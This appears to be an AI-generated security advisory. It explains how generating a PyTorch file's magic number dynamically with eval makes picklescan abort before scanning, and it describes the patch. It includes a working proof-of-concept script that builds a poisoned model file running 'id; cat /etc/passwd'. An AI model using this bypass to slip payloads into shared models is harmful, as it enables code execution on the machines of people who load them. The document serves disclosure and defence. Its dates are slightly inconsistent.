CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-97F8-7CMV-76J2
7.50.12%

The Magician's Trick: Bypassing Picklescan with Dynamic Eval

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 18, 2026·6 min read·2 visits

PoC Available

Executive Summary (TL;DR)

Picklescan, a tool for detecting malicious AI models, can be blinded by a simple trick. If the PyTorch 'magic number' header is generated dynamically (e.g., via `eval`), Picklescan crashes its check and stops scanning. Meanwhile, PyTorch successfully loads the header and executes the hidden malware waiting behind it.

A logic flaw in the Picklescan security tool allows attackers to bypass malware detection in PyTorch models. By dynamically generating the file header (magic number) using pickle opcodes, an attacker can cause the scanner to abort analysis early, effectively hiding malicious payloads located later in the file stream.

The Hook: Trusting the Wrapper

In the Wild West of AI/ML security, picklescan is the sheriff. It's the tool that Hugging Face and security-conscious developers use to check if that shiny new Llama-3 fine-tune you just downloaded is actually a useful neural network or just a disguised generic ransomware loader. It works by statically analyzing Python pickle files—the underlying format for PyTorch models—looking for dangerous function calls like os.system or subprocess.Popen.

The premise is simple: read the bytecode, spot the bad functions, and flag them before the victim runs torch.load(). But here is the problem with static analysis on a format that is effectively a Turing-complete stack machine: sometimes, the analyzer assumes the data follows the rules, while the interpreter (PyTorch) just executes whatever it's given.

This vulnerability is a classic case of "Parser Differential." The security tool sees a malformed header and throws a tantrum (and an exception), effectively quitting the job. The target application sees valid bytecode, executes it, and promptly hands over a reverse shell. It's like a bouncer checking an ID, finding it written in crayon, and fainting on the spot—letting the attacker walk right over their unconscious body.

The Flaw: A Magic Number Illusion

To understand this bug, you have to understand how legacy PyTorch files work. They are essentially a zip file containing a sequence of pickle files. The first pickle in the sequence is supposed to be a "Magic Number"—specifically 0x1950A86A20F9469CFC6C. This confirms to PyTorch that "Yes, this is a PyTorch file."

Picklescan's developers made a logical, but fatal, assumption: they assumed this magic number would be a static integer literal. Their code looked at the first pickle and asked, "Is this an integer opcode?"

Here is where it gets dark. In the pickle protocol, you don't have to provide a static integer. You can provide a function that returns an integer. An attacker can craft a pickle that says, "I am not a number, I am a function call to eval() that calculates a number."

When picklescan encounters this, its get_magic_number function fails to find a literal integer. It returns None. The scanner then compares None to the expected magic number, sees they don't match, and raises an InvalidMagicError. Crucially, this exception aborts the entire scan. The scanner stops reading. But a standard torch.load() call? It happily executes the eval(), gets the correct number, and continues loading the rest of the file—where the actual malware lives.

The Code: Static Assumptions vs. Dynamic Reality

Let's look at the smoking gun. The vulnerability lived in src/picklescan/scanner.py. The code tried to verify the header before moving on to the dangerous stuff.

The Vulnerable Logic:

# The scanner tries to pull a static int
magic = get_magic_number(data)
 
# If it's not the static int, it throws an error and aborts
if magic != MAGIC_NUMBER:
    raise InvalidMagicError(magic, MAGIC_NUMBER, file_id)
 
# ... scanning of the actual model data happens down here ...

The get_magic_number helper only understood pickle.INT or pickle.LONG opcodes. It had no concept of a reduced executable generating the value.

The Patch (Commit b999763):

The fix is clever. It acknowledges that if the magic number check fails, it might be an attack. Instead of crashing, it inspects that first pickle for dangerous globals.

magic = get_magic_number(data)
if magic != MAGIC_NUMBER:
    # Reset stream to the beginning
    data.seek(0)
    # Scan the "header" as if it were a payload
    first_pickle_result = scan_pickle_bytes(data, file_id, multiple_pickles=False)
    
    # If the header contains globals (like eval), flag it!
    if first_pickle_result.globals:
        _log.debug(f"Potential PyTorch magic number bypass detected in {file_id}...")
        scan_result.merge(first_pickle_result)
    else:
        # Genuine corruption, raise the error
        raise InvalidMagicError(magic, MAGIC_NUMBER, file_id)

Now, if you try to hide eval() in the header, picklescan catches it.

The Exploit: Crafting the Poisoned Header

To exploit this, we need to construct a PyTorch file that is valid enough for torch, but invalid enough to crash picklescan. We use the __reduce__ method to define how our objects are pickled.

Here is the recipe for disaster:

  1. Pickle #1 (The Decoy): Instead of writing the magic integer 0x19..., we write an instruction to eval("0x19..."). picklescan chokes on this. torch swallows it.
  2. Pickle #2...4 (The Filler): Standard PyTorch metadata (protocol version, sys_info, etc.) so torch doesn't complain.
  3. Pickle #5 (The Payload): The actual malicious code, like os.system.
import pickle
import os
 
# 1. The Magic Number Bypass
class MagicBypass:
    def __reduce__(self):
        # This evaluates to the correct magic number at runtime
        # but looks like a function call to static analysis.
        return (eval, ("0x1950A86A20F9469CFC6C",))
 
# 2. The Payload
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("id; cat /etc/passwd",))
 
with open("exploit.pt", "wb") as f:
    # The magic bypass (Picklescan crashes here)
    pickle.dump(MagicBypass(), f, protocol=2)
    
    # Required PyTorch metadata structure
    pickle.dump(1001, f, protocol=2)
    pickle.dump({}, f, protocol=2)
    pickle.dump([], f, protocol=2)
    
    # The payload (Picklescan never reaches here)
    pickle.dump(MaliciousPayload(), f, protocol=2)
    pickle.dump(None, f, protocol=2)

When picklescan <= 1.0.2 scans this file, it throws an error on the first pickle and exits. The user, assuming the tool is just being finicky or the file is slightly weird, might load it anyway. When they run torch.load('exploit.pt'), the code executes.

The Impact: Supply Chain Poisoning

Why is this critical? Because the entire AI ecosystem relies on trust. We download gigabytes of weights from Hugging Face, Civitai, and GitHub. Tools like picklescan are the only line of defense between a Data Scientist's laptop and a total compromise.

If an attacker can bypass the scanner, they can upload a "fine-tuned" model that contains a backdoor. Since the scanner reports an error (often interpreted as "parsing failed" rather than "malware found") or simply crashes, automated pipelines might fail open, or human analysts might ignore the warning.

The result? Remote Code Execution (RCE) on any machine that loads the model. In an ML cluster, that means access to GPU resources, training data, and proprietary model weights.

The Fix: Upgrade or Die

The mitigation is straightforward: Update picklescan to version 1.0.3 or higher.

If you are building your own scanner, the lesson here is broader: Never trust the file format to enforce its own structure. If you are parsing serialization formats like Pickle, YAML, or XML, assume the parser can be tricked.

Specifically for Pickle:

  1. Do not abort on header errors; treat them as suspicious.
  2. Scan the entire stream, even if the beginning looks garbage.
  3. Better yet, stop using Pickle for ML models. Switch to safetensors, which is a safe, zero-copy format that doesn't involve code execution.

Official Patches

Picklescan (GitHub)Commit patching the magic number bypass

Fix Analysis (1)

Technical Appendix

CVSS Score
7.5/ 10
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Probability
0.12%
Top 100% most exploited

Affected Systems

picklescan <= 1.0.2Systems ingesting untrusted PyTorch modelsMLOps pipelines relying on picklescan for validation

Affected Versions Detail

Product
Affected Versions
Fixed Version
picklescan
mmaitre314
<= 1.0.21.0.3
AttributeDetail
Attack VectorLocal / File-based
ImpactRemote Code Execution (RCE)
CWECWE-693: Protection Mechanism Failure
CVSS7.5 (High)
Componentpicklescan.scanner.scan_pytorch
DetectionBypassed via dynamic header generation

MITRE ATT&CK Mapping

T1027Obfuscated Files or Information
Defense Evasion
T1204.002User Execution: Malicious File
Execution
T1574Hijack Execution Flow
Persistence
CWE-693
Protection Mechanism Failure

Vulnerability Timeline

Vulnerability Discovered
2026-02-01
Patch Committed (b999763)
2026-02-15
Advisory GHSA-97F8-7CMV-76J2 Published
2026-02-20

References & Sources

  • [1]GHSA Advisory
  • [2]Issue Tracker Discussion

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.